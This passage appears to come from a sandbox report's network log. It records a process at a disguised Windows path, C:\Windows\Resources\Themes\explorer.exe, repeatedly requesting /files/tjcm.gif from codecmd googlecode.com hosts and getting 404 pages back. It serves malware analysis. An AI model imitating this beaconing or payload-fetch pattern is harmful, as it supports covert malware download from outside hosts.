                                                                                                      Sep 30, 2024 16:15:54.139887094 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      99192.168.2.54981374.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:54.594264984 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:55.319365025 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:55 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:55.319380999 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      100192.168.2.549814108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:55.767640114 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:56.526201010 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:56 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:56.526240110 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      101192.168.2.549815108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:56.947765112 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:57.639041901 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:57 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:57.639143944 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      102192.168.2.54981674.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:58.522241116 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:59.246527910 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:59 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:59.246702909 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      103192.168.2.549817108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:59.757992029 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:00.456548929 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:00 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:00.456568003 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      104192.168.2.549818108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:01.355806112 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:02.039602041 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:01 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:02.039832115 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      105192.168.2.54981974.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:02.440783024 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:03.147274017 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:03 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:03.147397041 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
